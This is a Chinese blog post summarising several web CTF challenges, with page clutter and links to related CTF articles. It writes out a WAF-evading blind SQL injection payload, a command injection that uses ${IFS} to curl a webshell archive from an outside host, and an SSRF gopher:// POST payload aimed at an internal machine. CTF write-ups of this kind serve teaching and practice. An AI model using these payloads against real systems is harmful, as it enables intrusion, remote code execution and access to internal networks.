CTF 小结

最新推荐文章于 2024-04-19 14:33:43 发布
最新推荐文章于 2024-04-19 14:33:43 发布
阅读量1.5k 收藏
点赞数
分类专栏: 遇到过的一些坑
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33020901/article/details/53005025
版权

Web200-1(Web1)

地址: http://web1.08067.me/  sql注入

万能密码测试无效有waf , ban掉的东西不少 ... *, and , or , union , 空格 ,逗号    抓包发现 http头发现有提示

在网上查找了一番,发现可以利用括号来代替空格

select pass from admin where user='Seclover'
select(pass)from(admin)where(user)=('Seclover')

为了消除结尾的 ' ,select * from admin where username='haha'=1='0' 这样也可以查询

逻辑是 , 假假真 为假,where后面的连等如果有一项的值为空或者为0的时候,那么整个查询结果都是空,否则就可以查询出东西

接下来,使用布尔盲注,but,逗号被过滤,mid () ,substring() ,left ()  , left () ,right () 等需要使用 逗号

但是 substring提供了另一个用法:SUBSTRING(str FROMpos FORlen)

构造paload uname=admin'=(select(select(substring(passwd%a0from%a0"+str(jj)+"))from%a0admin%a0where%a0uname='admin')='"+ii+xx+"')='1'='1&passwd=
然后写一个脚本自己跑,得到密码,然后登录

然后是一个模拟终端 ,不能输入空格 ,  所以用${IFS} 代替空格

,x.zip为一句话,curl${IFS}http://xx.xxx.com/x.zip  然后解压 unzip${IFS}x.zip 得到shell


http://web5.08067.me/

首先是官方给的提示是:

ssrf,关注下其他的协议,flag不在本机


首先用file:///etc/sysconfig/network-scripts/ifcfg-eth0 读取网卡地址

  1. DEVICE=eth0  
  2. HWADDR=00:0C:29:F0:AE:2A  
  3. TYPE=Ethernet  
  4. UUID=a1ca5d0e-61c9-4693-82ee-437eb0331617  
  5. ONBOOT=yes  
  6. NM_CONTROLLED=yes  
  7. BOOTPROTO=static  
  8. IPADDR=172.16.181.165  
  9. NETMASK=255.255.255.0  
  10. GATEWAY=172.16.181.2  
  11. DNS1=114.114.114.114  
  12. DNS2=172.16.181.2 
然后扫描ip段的存活机器, 172.16.181.*

然后发现post提交的页面 ,这个必须使用Gopher 协议发送post 协议,否则内网机器接收不到发送的数据

这里构造的时候要注意url 的编码和Content-Length的长度不能算错,还有就是url 编码两次

http://web5.08067.me/index.php?url=gopher%3A%2f%2f172.16.181.166%3A80%2f_POST%20%2fadmin%2fwllmctf_login.php%20HTTP%2f1.1%250d%250aHost%3A%20172.16.181.166%250d%250aUser-Agent%3A%20curl%2f7.43.0%250d%250aAccept%3A%20%2a%2f%2a%250d%250aContent-Length%3A%2029%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3Dadmin%26password%3D12312%26submit%3Dsubmit



http://web3.08067.me/wakeup/index.php

官方给了提示:编辑器直接写代码


查看robots.txt 发现 index.php  function.php

.bak泄露,index.php.bak,function.php.bak

获得源码 ,发现是反序列化漏洞,利用就行了 ....




PD_3569
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf通防waf
weixin_60777183的博客
11-07 746
<?php /**CTF—**/ error_reporting(0); class CTF_WAF{ public $getfilter; public $postfilter; public $cookiefilter; public $orther; public $url; public $dir; public $ip; public $Waf_switch;
CTF-6.SSH服务渗透
woo233的博客
09-12 1261
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程的信息泄露问题。基于TCP 22号端口的服务。在对SSH服务渗透,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF要特别注意。
2024最全CTF入门指南(建议收藏)
最新发布
ewii12567的博客
04-19 855
CTF(Capture The Flag)文一般译作夺旗赛,在网络安全领域指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场的“世界杯”。
CTF——AWD模式小总结
weixin_46079186的博客
11-04 1万+
本文以bugku平台awd比赛来写 awd 比赛平台 一、防御(比赛开始有30分钟防御时间) 比赛开始得到一个 靶机,如下信息ssh 用户名和密码,还有虚拟ip 然后我们ssh 连接进行防御,这里我推荐使用Xshell配合Xftp使用,打开xshell 新建一个连接,写入相应信息 填入用户名还有密码,然后点击连接 2. 进入之后我们直接点击,xftp按钮(目的: 需要连接xftp下载文件) 连接成功后如下 进入/var/www将html文件下载下来 (目的是扫描是否存在后门,还有代码审计
网络攻防之ssh篇(穿插ctf的web例题)
qq_62097048的博客
07-08 1278
对于ssh进行的相关操作,有ctf的web例题
ctf awd知识分享(常用命令,不死马,waf,文件监控)
2202_75361164的博客
10-28 1028
ctf awd知识分享(常用命令,不死马,waf,文件监控)
ctf加解密小结
08-15
ctf关于加解密特征的一些小结,以作做题时的参考。摘要好烦
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库有哪些表; 五、查看表有哪些属性;
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境得到一串具有一定格式的字符...
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf,重点可能指向了一个名为“dirsearch”的...
CTF 比赛思路总结 PPT 含学习链接
09-13
信息收集 代码审计 web漏洞汇总 工具使用技巧 高级漏洞利用 web思路
CTF】AWDP总结(Web)
weixin_51614272的博客
06-29 1万+
AWDP是一种综合考核参赛团队攻击、防御技术能力、即时策略的攻防兼备比赛模式。每个参赛队互为攻击方和防守方,充分体现比赛的实战性、实时性和对抗性,对参赛队的渗透能力和防护能力进行综合全面的考量。比赛,每支队伍拥有相同配置的虚拟靶机,参赛队员需对平台的GameBox发起攻击,并向平台提交正确的flag(证明自己具备对该题的攻击能力);在此期间,由平台以轮次制的方式向参赛队伍的靶机发起攻击,检查其他选手的漏洞是否修补成功,若修补成功则认为参赛队伍具备该漏洞的防御能力。计分规则如下:比赛过程每支参赛队拥有相
CTF签到题
m0_67935111的博客
05-08 1717
提示输入口令zhimakaimen,但是查看源代码发现输入框对长度有限制,最长只能输入10位,使用firefox插件firebug,chrome控制台可直接对manlength值进行修改,改为大于11,即可输入;也可以使用burpsuite进行抓包,直接修改post值即可得到flag! flag is:nctf{follow_me_to_exploit} ...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
CTFweb篇——签到题
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到题。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过题目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response Headers 找到Flag ok完成。 ...
CTF常见的编码,代码混淆及加、解密
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
07-27 6278
其实刚开始我对编码与加密的概念区分的不是非常清楚,一度以为加密就是对信息进行编码,这是一种错误的观点。编码是将数据信息转化成一种固定格式的编码信息,而加密是为了保证信息传输的安全性,两者还是有区别的。接下来就给大家讲讲编码与加密、解密。 一,编码 编码是为了方便不同系统间的信息传输,将数据转化成固定格式的信息,通过编码可以得到原始信息。常见的编码我们都已经很熟悉了,比如ASCII编码、URL编码、...
记录第一次ctf比赛
姜小孩的博客
10-11 1179
第一关是在根据题目提示是在F12里一开始漫无目的的寻找,回头再看看题的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一道题看来是给出的礼物hhhhhhhh 第二关是题目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的题目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其json需要用json格式,代码如下: <?php h
RSA e很小 ctf
10-15
RSA加密算法,e是公钥的一个参数,通常取值为65537,这是因为65537是一个质数,且比较大,使得加密过程更加安全。但是如果e取值过小,会导致加密过程不够安全,容易被攻击者破解。在CTF比赛,有时候会出现RSA e很小的情况,这时候可以使用低指数攻击(Low-Exponent Attack)来破解RSA加密。 低指数攻击的基本思想是:如果明文m比较小,而e也比较小,那么可以通过对密文c进行多次开方,最终得到明文m。具体来说,假设密文c = m^e mod n,其n是两个大质数p和q的乘积,e比较小,那么可以对c进行多次开方,直到得到明文m。例如,如果e=3,那么可以对c进行三次开方,即c^(1/3)^(1/3)^(1/3),最终得到明文m。 需要注意的是,低指数攻击只适用于e比较小的情况,并且需要知道明文m的大小。如果明文m比较大,或者e比较大,那么低指数攻击就不再适用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值